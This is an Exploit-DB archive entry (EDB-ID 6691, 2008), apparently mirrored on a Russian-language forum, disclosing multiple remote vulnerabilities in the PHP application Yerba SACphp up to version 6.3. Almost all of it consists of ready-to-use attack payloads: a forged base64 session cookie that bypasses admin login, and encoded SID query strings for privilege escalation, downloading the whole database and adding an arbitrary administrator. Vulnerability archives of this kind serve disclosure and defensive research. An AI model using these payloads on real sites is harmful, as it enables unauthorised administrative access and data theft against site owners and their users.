- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6691
- Проверка EDB
-
- Пройдено
- Автор
- STAKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-5873 cve-2008-4486
- Дата публикации
- 2008-10-07
Код:
[*]~======================================================~[*]
[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]
[*]~======================================================~[*]
[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
[?] Discovered On 07/10/2008
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
[?] Admin Login ByPass
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
[?] Privilege Escalation
[?] index.php?SID=[path (base64 encoded)]
[?] Arbitrary Database Download
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
[?] Arbitrary Add Admin
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
# milw0rm.com [2008-10-07]- Источник
- www.exploit-db.com
